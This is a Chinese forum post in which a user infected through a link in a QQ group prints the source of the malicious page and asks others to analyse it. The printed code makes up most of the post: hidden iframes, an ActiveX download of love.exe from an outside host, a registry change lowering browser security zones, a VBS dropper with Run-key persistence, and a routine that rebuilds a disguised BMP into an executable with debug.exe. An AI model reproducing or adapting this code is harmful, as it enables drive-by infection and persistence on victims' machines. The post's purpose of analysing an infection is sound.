分析一下这个病毒(不要轻易打开其中的网址)
今天QQ群乱套了,有人发消息
http://nicex.126.com
看看啊. 我最近照的照片~ 才扫描到网上的.看看我是不是变了样?
我点了链接,不一会,我的QQ也向QQ群中发这条消息,我知道我中毒了。。。。
QQ群中很多人都中了毒。。。。。。。。。
我分析了一下,终于找到病根,请大家分析一下
网页中包含以下两行
<iframe src="1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="2.htm" width="0" height="0" frameborder="0"></iframe>
其中1.htm内容如下
<HTML>
<HEAD>
<TITLE>aaa</TITLE>
</HEAD>
<BODY>
<OBJECT
classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D" codebase="http://yy20.nease.net/zcyh/images/WebDownLoadProj1.ocx#version=1,0,0,0"
width=1 height=1 align=center
hspace=0 vspace=0>
<param name="StrUrl" value="http://yy20.nease.net/zcyh/love.exe">
</OBJECT>
<iframe src="love.mht" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</BODY></HTML>
其中又包含了love.mht,这是一个编码后的邮件,其中包含一个可执行文件
Content-Type: audio/x-wav;
name="jieba.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>
由于这个文件太大,无法在此帖出
2.htm
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
<script language="javascript">
<!-- Begin
function opencolortext(){
window.open('3.htm','colortext','top=9999,left=9999,width=0,height=0')
}
setTimeout("opencolortext()",2000)
// End -->
</script>
其中打开了3.htm,其内容为
<HTML>
<HEAD>
<TITLE>网易广告</TITLE>
</HEAD>
<BODY>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"love.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>
<IMG SRC=Server.bmp width=0 height=0>
<SCRIPT SRC=Server.js></SCRIPT>
</BODY></HTML>
其中包括的Server.js内容如下
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>');
function docsave()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso=a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs','wscript '+'"'+vbs+'"');
wsh.RegWrite('HKCR\\.VBS\\','VBSFile');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine('Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"Server[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(folder) & "\\" & folder.name & "\\" & fname');
st.WriteLine(' if FSO.FileExists(str) then');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)');
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine(' Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("3")');
st.WriteLine(' Lt.WriteLine("rcx")');
st.WriteLine(' Lt.WriteLine("5492")');
st.WriteLine(' Lt.WriteLine("w136")');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' On Error Resume Next ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st.WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' For Each SubFolder In Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st.WriteLine(' End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);
我晕了。。。。。。。。。。。。。这病毒牛,谁能解开其中奥秘?